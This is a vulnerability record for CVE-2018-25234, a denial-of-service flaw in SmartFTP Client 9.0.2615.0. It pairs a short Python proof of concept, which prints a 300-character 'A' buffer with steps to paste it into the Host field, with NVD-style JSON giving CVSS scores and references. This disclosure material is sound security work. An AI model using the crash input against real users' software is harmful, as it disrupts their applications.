CVE-2018-25234

import sys # Proof of Concept (PoC) for CVE-2018-25234 # Vulnerability: SmartFTP Client 9.0.2615.0 Denial of Service # Description: Supplying a buffer of 300 repeated characters in the Host field crashes the app. def generate_payload(): # The vulnerability is triggered by a long string in the Host field. # Testing indicates 300 characters are sufficient. buffer_size = 300 payload = "A" * buffer_size return payload if __name__ == "__main__": crash_string = generate_payload() print(f"Generated Payload: {crash_string}") print("Steps to reproduce:") print("1. Open SmartFTP Client 9.0.2615.0") print("2. Go to connection settings (New Connection)") print("3. Paste the above payload into the 'Host' field") print("4. The application should crash (Denial of Service)")

{"cve": {"id": "CVE-2018-25234", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:17.510", "lastModified": "2026-04-08T16:37:56.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmartFTP Client 9.0.2615.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Host field. Attackers can paste a buffer of 300 repeated characters into the Host connection parameter to trigger an application crash."}, {"lang": "es", "value": "SmartFTP Cliente 9.0.2615.0 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Host. Los atacantes pueden pegar un búfer de 300 caracteres repetidos en el parámetro de conexión Host para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-466"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartftp:smartftp:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.0.2615.0", "matchCriteriaId": "FCBEDBBB-E8AF-4D4D-8F3F-26B31BAB5ABA"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45759", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.smartftp.com/en-us/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.smartftp.com/en-us/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartftp-client-denial-of-service-via-host-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}